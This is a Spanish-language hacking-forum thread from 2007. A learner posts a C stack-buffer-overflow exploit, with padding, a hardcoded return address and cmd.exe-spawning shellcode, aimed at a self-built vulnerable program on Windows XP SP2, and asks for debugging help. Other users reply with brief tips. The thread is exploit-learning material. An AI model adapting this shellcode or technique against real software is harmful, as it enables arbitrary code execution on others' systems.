elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 05:40  

Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  alguien me dice mi error
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: alguien me dice mi error  (Leído 1,659 veces)
Dark_Knight

Desconectado Desconectado

Ver Perfil
alguien me dice mi error
« en: 30 Marzo 2007, 23:34 »

hola

necesito ayuda... bueno yo cre que demasiada... es que todavia soy aprendiz en exploits.... ya mas o menos le estoy entendiendo.... pero aun me falta entender mas cosas... espero me puedan ayudar..

estoy aprendiendo del exploit de rojodos... ya hice el archivo vulnerable y el exploit.. pero cuando ejecuto el exploit me aparece una shel ms-dos con lo que dice en el manual de rojodos que pongamos en printf para ver que sucede pero solo me aparece por unos segundos.. y despues me aparece otra pantalla de ms-dos pero no hay nada y desaparece a los 2 segundos de haber ejecutado el exploit... me imagino que entonces el exploit esta mal hecho... pero no se que hacer... les dejo el codigo para ver si pueden ayudarme..

Código:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

int main(int argc, char**argv)

{
char evilbuffer[1024]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQQRRRRSSSS";

char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6"
"\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50\xBB\xC7\x93\xC2\x77\xFF\xD3";
char offset[]="\xED\xE1\x49\xC7";
strcat(evilbuffer,offset);
strcat(evilbuffer,shellcode);
printf("Cadena+offset+shellcode en formato printable\n");
printf("%s",evilbuffer);
ShellExecute(NULL,"OPEN","vulnerable.exe",evilbuffer,NULL,true);
return 0;
}

que estoy haceindo mal.. estoy usando windows xp sp2... y estoy usando visual c++ 6.0

alguien ayudeme porfavor...

Les mando un saludo... GRACIAS  ;D

hola

Alguien de casualidad a hecho el ejemplo de exploit de rojodos y le a salido bien...

Podrian poner una imagen de como deberia o que deberia pasar al ejecutar el exploit porfavor...

Es que por mas que le busco no encuentro como hacerlo funcionar.. y tambien no se que deberia de suceder al ejecutar el exploit..  cry

Tambien alguien sabe si este ejemplo aun funiona en Windows xp sp2... porfa si alguien me puede ayudar se los agradezco...

Salu2.. Gracias  wink

hola

ya modifique el codigo... y ya me aparece el mensaje de error en el archivo vulnerable... sin embargo, solamente me aparece la shell del exploit, y la del archivo vulnerable... despues me aparece el mensaje de error y desaparece todo... alguien me podria decir si eso es todo o todavia me haria falta que me aparezca una shell del exploit, ya que estuve utilizando un exploit para ver como funcionaban.. y despues de ejecutarlo me aparece otra shell para revisar los directorios y cuando la cierro, me aparece el mensaje de error del programa y todo desaparce, creo que eso es normal... pero en el exploit de ejemplo de rojodos... solamente me aparecen las dos shell´s... el mensaje de error y desaparece todo.. creo que estoy haciendo algo mal... alguien sabe que podria estar haciendo mal porfavor..

les mando un saludo.. gracias  grin
« Última modificación: 12 Abril 2007, 08:19 por Sirdarckcat » En línea

El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
Freestyle10

Ver Perfil
Re: alguien me dice mi error
« Respuesta #1 en: 17 Mayo 2007, 15:38 »

Como estas lanzando el exploit desde dos o des windows?
NewLog

Ver Perfil WWW
Re: alguien me dice mi error
« Respuesta #2 en: 19 Mayo 2007, 22:48 »

Ejecútalo desde el símbolo del sistema (cmd) o antes del return 0; añade un getchar(); o un system("PAUSE");
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguien me dice el error? (solucionado)
Programación C/C++
;c1v!c 2 679 Último mensaje 8 Junio 2011, 21:41
por ;c1v!c
alguien me dice q es esto?
Criptografía
elenan 4 461 Último mensaje 30 Abril 2012, 16:08
por elenan